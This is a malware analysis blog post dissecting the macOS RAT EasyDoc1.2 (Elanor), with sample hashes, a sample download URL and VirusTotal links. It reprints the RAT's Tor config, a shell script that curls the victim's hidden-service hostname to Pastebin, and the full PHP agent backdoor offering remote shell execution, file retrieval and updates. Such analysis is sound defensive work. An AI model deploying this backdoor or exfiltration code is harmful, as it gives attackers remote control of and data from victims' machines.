Comment on MacOSX/backdoor/RAT EasyDoc1.2 (aka Elanor)

There is a story of macosx new malware EasyDoc1.2 (so called Elanor), so I took a check. references:

+------------- start snip --------------+

https://www.macupdate.com/app/mac/56544/easydoc-converter

Sample: http://spacerunner.altervista.org/easydoc/EasyDoc1.2.zip f5df7d89f1bd6d6a8c3539320fc091f8dae3c9e3c25176c02392de2bb5ea9e19

+------------- end snip --------------+

Fetching the samples I made comments in virus total as per below:

+------------- start snip --------------+

https://www.virustotal.com/en/file/2c752b64069e9b078103adf8f5114281b7ce03f1ca7a995228f180140871999e/analysis/

https://www.virustotal.com/en/file/5dbbb91467e0f6e58497ae0c0c621a84a1f250bb856f3f9f139e70dedf1a32b7/analysis/

https://www.virustotal.com/en/file/5a61246c9fe8e52347e35664e0c86ab2897d807792008680e04306e6c2104941/analysis/

https://www.virustotal.com/en/file/885d3a1c7b62d4726ee2bb6039162487f49473220f5d6ef171c86c03b818bdda/analysis/1467856802/

https://www.virustotal.com/en/file/f257f2f97bf5cf9d7a0021046bb3d2a0b7cd16e38b152f6247c6e1f142864e52/analysis/

https://www.virustotal.com/en/file/d2f289edaf4dc88aa703645ce21948b7863e69d64fc3e5aaa5bb5c972fb3b395/analysis/

+------------- end snip --------------+

#### My analysis comment (read: rant) ###

I was expected some native savvy apps for this RAT, instead, what I see is a super lame RAT!!!

The so called "RAT" is a wrapping of various shell script, PHP script and open source application to form a "Tor web based RAT"..

Any skiddie can make this.. And I won't surprise if the builder of this RAT is a skiddo.

There is nothing special about this RAT EXCEPT: AppleStore was letting this apps to enter-

their system... (got fooled by the lame specs made by this app coder/hacker)

#### Malware Package ####

Complete package: EasyDoc1.2.zip: f5df7d89f1bd6d6a8c3539320fc091f8dae3c9e3c25176c02392de2bb5ea9e19

### Malware installer component ####

installer:

"script": https://www.virustotal.com/en/file/2c752b64069e9b078103adf8f5114281b7ce03f1ca7a995228f180140871999e/analysis/

This installer is to install:

+------------- start snip --------------+

Tor hidden service : com.getdropbox.dropbox.integritycheck_orig.plist 23d0146a90a68970486ea84e4dc4a025

Pastebin Agent : com.getdropbox.dropbox.timegrabber_orig.plist f3b7b46b97a42c4a332e5115f1f93812

Web Service PHP : com.getdropbox.dropbox.usercontent_orig.plist 55321aee01a52050631ecc21140f7b69

+------------- end snip --------------+

*) this is a LOL.. The Web service PHP is using a plain default PHP.INI file is renamed as "config" https://www.virustotal.com/en/file/d2f289edaf4dc88aa703645ce21948b7863e69d64fc3e5aaa5bb5c972fb3b395/analysis/

*) Noted the "dropbox" is only a bogus naming..

### Malware "backdoor" ####

Backdoor1 (to Tor incoming panel)

File: Library/.dropbox/sync/conn 0c3d62d6fc28d15b5c580a9617a9f4c5

It's a Backdoor to syncto Tor, the config of this backdoor is "storage" file

+------------- start snip --------------+

$ cat storage (default MD5,413F1F647240A02CF54B57CF270FEE17)

DirReqStatistics 0

GeoIPFile /Users/elle/Library/.dropbox/sync/data/list

GeoIPv6File /Users/elle/Library/.dropbox/sync/data/list6

HiddenServiceDir /Users/elle/Library/.dropbox/sync/hs

HiddenServicePort 80 127.0.0.1:9991

HiddenServicePort 22 127.0.0.1:9992

DataDirectory /Users/elle/Library/.dropbox/.rero

SOCKSPort 9060

ControlPort 9061

+------------- end snip --------------+

which is actually the PlugableTransport configuration file of Tor project ...yes it is an open source.

Another #facepalm is...

the Backdoor2: shell.php > it is only obfuscation of known hacktool web shell (like WSO) "b374k":

ref: https://github.com/b374k/b374k/blob/master/index.php

The hacker who made this app just add the link to the galery.php to show -

the captured pics via wacaw http://webcam-tools.sourceforge.net/ < this is Open source too FYI...

Backdoor3: pastebin uploader via API..

based on pastebin API sample code,...practically a made-up code to upload the credential ala formgrabber...

file: save https://www.virustotal.com/en/file/5dbbb91467e0f6e58497ae0c0c621a84a1f250bb856f3f9f139e70dedf1a32b7/analysis/

+------------- start snip --------------+

$ cat save

#!/bin/sh

USER=$(whoami)

if [ -e "/Users/$USER/Library/.dropbox/sync/hs/hostname" ]; then

HOSTNAME=$(cat /Users/$USER/Library/.dropbox/sync/hs/hostname | cut -d '.' -f 1)

echo "Hostname found: $HOSTNAME"

echo "Saving hostname online..."

curl -d "api_paste_code=$HOSTNAME&api_option=paste&api_dev_key=d1e52e9d2452e1810279527aa1a83c8b&api_paste_private=2&api_user_key=df8a73a0813c422465564c913e760d87" "http://pastebin.com/api/api_post.php"

echo "

"

else

echo "Cannot find hostname value."

fi

+------------- end snip --------------+

Sample uploaded data posted (these are real ones, seeked in pastebin, collected it, no public share)

aHR0cHM6Ly9wYXN0ZWJpbi5jb20vOFpEMFB6VHo=

Backdoor 4, remote control in....a PHP script....

File: agent.php https://www.virustotal.com/en/file/5a61246c9fe8e52347e35664e0c86ab2897d807792008680e04306e6c2104941/analysis/

It support remote command of to update the components, getting information, getting file from the infected OSX and shell execution...

+------------- start snip --------------+

<?php

$request = json_decode(@file_get_contents('php://input'));

if(isset($_GET」'methodName'」)) {

switch ($_GET」'methodName'」) {

case 'getInfos':

if(file_exists('sync/hs/hostname')) {

$res」'result'」」'uuid'」 = file_get_contents('sync/hs/hostname');

} else {

$res」'result'」」'uuid'」 = 'tor error';

}

$res」'result'」」'username'」 = get_current_user();

if(file_exists('timestamp')) {

$res」'result'」」'updateTimestamp'」 = file_get_contents('timestamp');

} else {

$res」'result'」」'updateTimestamp'」 = '0';

}

break;

case 'executeShellScript':

if($request->script) {

$script = '#!/bin/sh' . "

". $request->script . "

";

@file_put_contents('temp.sh', $script);

if(file_exists('temp.sh')) {

$output = shell_exec('sh temp.sh');

unlink('temp.sh');

$res」'result'」 = $output;

} else {

$res」'error'」 = 1;

}

} else {

$res」'error'」 = -3;

}

break;

case 'getFile':

if($request->path) {

if(file_exists($request->path)) {

if(filesize($request->path) < 2000000) {

$hex = base64_encode(file_get_contents($request->path));

$res」'result'」 = $hex;

} else {

$res」'error'」 = 1;

}

} else {

$res」'error'」 = 2;

}

} else {

$res」'error'」 = -3;

}

break;

case 'update':

if($request->timestamp && $request->data) {

file_put_contents('update.zip', base64_decode($request->data));

$zip = new ZipArchive;

$zipRes = $zip->open('update.zip');

if ($zipRes === TRUE) {

$zip->extractTo('./');

$zip->close();

$res」'result'」 = "true";

file_put_contents('timestamp', $request->timestamp);

shell_exec('rm -rf __MACOSX');

} else {

$res」'error'」 = 1;

}

unlink('update.zip');

} else {

$res」'error'」 = -3;

}

break;

default:

$res」'error'」 = -2;

break;

}

} else {

$res」'error'」 = -2;

}

@header('Content-Type: application/json');

echo json_encode($res);

?>

+------------- end snip --------------+

The last is..

Backdoor5... a netcat (nc) binary.... which this is, as you know it too, a good tool.

### Conclusion ####

This is it.. so what is so special about this "RAT" except it successfully wrapping stuff in a package for malicious purpose and successfully fooling AppleStore?:-)

#MalwareMustDie